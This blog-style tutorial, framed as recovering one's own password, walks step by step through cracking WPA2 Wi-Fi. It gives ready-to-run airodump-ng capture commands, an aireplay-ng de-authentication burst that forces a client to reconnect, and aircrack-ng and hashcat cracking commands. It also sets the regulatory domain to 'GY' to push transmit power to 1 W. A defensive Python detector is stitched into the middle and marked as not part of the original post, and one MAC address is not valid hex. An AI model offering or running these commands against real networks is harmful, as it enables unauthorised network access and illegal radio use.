I forgot my WIFI password
--
Oh, it’s no longer a problem…
I want to show how I recovered my own Wi-Fi password. The essential tool in wireless security testing is the wireless adapter: it must support monitor mode and packet injection into a wireless stream. Most standard adapters support monitor mode, so you can run the airodump-ng command and listen to the wireless traffic around you, but injection support is required to run the aireplay-ng command. A list of supported adapters is given in [1].
I used only these tools below:
- Laptop with GPU
- Alfa AWUS036AC adapter
- Latest Kali Linux
My virtual machine with Kali Linux [2] is ready. I need to make sure my Wi-Fi adapter is attached to the virtual machine.
On the VirtualBox toolbar:
Settings > Ports > USB > + > USB Realtek adapter
Once the operating system has loaded, log in with the default user root and password toor. In a new terminal window I check for available Wi-Fi devices:
iwconfig
I see a device named wlan0.
# Optional: upgrade the installed packages (not required for the steps below).
sudo apt update && sudo apt upgrade -y
By default, the latest Kali has hashcat, aircrack-ng and other tools preinstalled, but it is also possible to install these tools on Ubuntu or another distribution.
# Optional: only if the OS is not Kali
sudo apt install hashcat aircrack-ng -y
My Alfa adapter is capable of sniffing and injecting packets. I need to switch the adapter into monitor mode. Usually a Wi-Fi adapter is recognized as wlan0, and once it is in monitor mode it appears as wlan0mon.
airmon-ng check kill && airmon-ng start wlan0
I scan the wireless area to get the technical details of my own access point.
airodump-ng wlan0mon
From the output I see that my access point's signal is strong, its packet count is increasing, and it is on channel 5. My goal is to capture only my own handshake, so I restrict airodump-ng to that channel and BSSID and write the captured packets to a file.
airodump-ng wlan0mon --channel 5 --bssid 55:CC:BB:11:LT:12 --write mywifi --force
It is essential to have at least one device connected to the access point. During the four-way handshake, the key material is exchanged between the client and the access point; the handshake can be triggered again by de-authenticating the client. In a new terminal I ran the command with the access point and client addresses and the number of de-authentication attempts.
aireplay-ng wlan0mon -a 55:CC:BB:11:LT:12 -c 55:44:44:68:73:65 -0 99
I wait for the message "WPA handshake: 00:11:22:33:44:55" in the top right-hand corner of the airodump-ng terminal; after a few moments it appears on my screen.
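The de-authentication burst sent above (99 frames at one client) is also easy to spot from the defender's side. As an added example that is not part of the original post, this Python snippet flags a flood of de-auth frames aimed at one client within a short window; the frame records and MAC-like labels are constructed here and the record format is an assumption, not the output of any particular tool.

```python
# Added example: detect de-authentication floods in monitor-mode frame records.
# Each record is an assumed (timestamp_seconds, subtype, bssid, destination) tuple.
from collections import deque, defaultdict

DEAUTH = "deauth"


def find_deauth_bursts(frames, window=2.0, threshold=10):
    """Return {(bssid, dest): peak_count} for every (bssid, dest) pair that
    receives at least `threshold` de-auth frames within any `window` seconds.
    A roaming client sees a handful of de-auths; dozens in a couple of
    seconds is the signature of a forced-reconnect attempt."""
    recent = defaultdict(deque)  # (bssid, dest) -> timestamps inside the window
    alerts = {}
    for ts, subtype, bssid, dest in sorted(frames, key=lambda f: f[0]):
        if subtype != DEAUTH:
            continue
        key = (bssid, dest)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:  # evict timestamps older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts


# Constructed sample: a beacon, one benign de-auth, then a 30-frame burst at one client.
SAMPLE_FRAMES = (
    [(0.0, "beacon", "ap:00:00:00:00:01", "ff:ff:ff:ff:ff:ff"),
     (1.5, DEAUTH, "ap:00:00:00:00:01", "c1:00:00:00:00:01")]
    + [(10.0 + i * 0.05, DEAUTH, "ap:00:00:00:00:01", "c1:00:00:00:00:02")
       for i in range(30)]
)

if __name__ == "__main__":
    for (bssid, dest), n in find_deauth_bursts(SAMPLE_FRAMES).items():
        print(f"possible de-auth flood from {bssid} to {dest}: {n} frames in 2 s")
```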
I have two options:
Option 1: a dictionary attack with aircrack-ng, using a list of the most common passwords.
aircrack-ng -a 2 -b 55:CC:BB:11:LT:12 -w wordlist.txt mywifi-01.cap
Option 2: convert the capture to hashcat's format and run a mask attack with hashcat on the GPU.
aircrack-ng -j hashcat mywifi-01.cap
# And it's time for hashcat :)
sudo hashcat -m 2500 -a 3 hashcat.hccapx ?d?d?d?d?d?d?d?d --potfile-path wpa2.pot
The hash, the SSID and my password are printed in the terminal and saved in the file "wpa2.pot".
One more thing: with this configuration you may need to increase the TX power up to 1 W.
Tested on an AWUS036H:
ifconfig wlan0 down
iw reg set GY
ifconfig wlan0 up
ifconfig wlan0
References
[1] https://null-byte.wonderhowto.com/how-to/check-if-your-wireless-network-adapter-supports-monitor-mode-packet-injection-0191221/
[2] https://medium.com/@tomas_savenas/kali-2018-4-and-metasploit-framework-5-0-73190afc9d96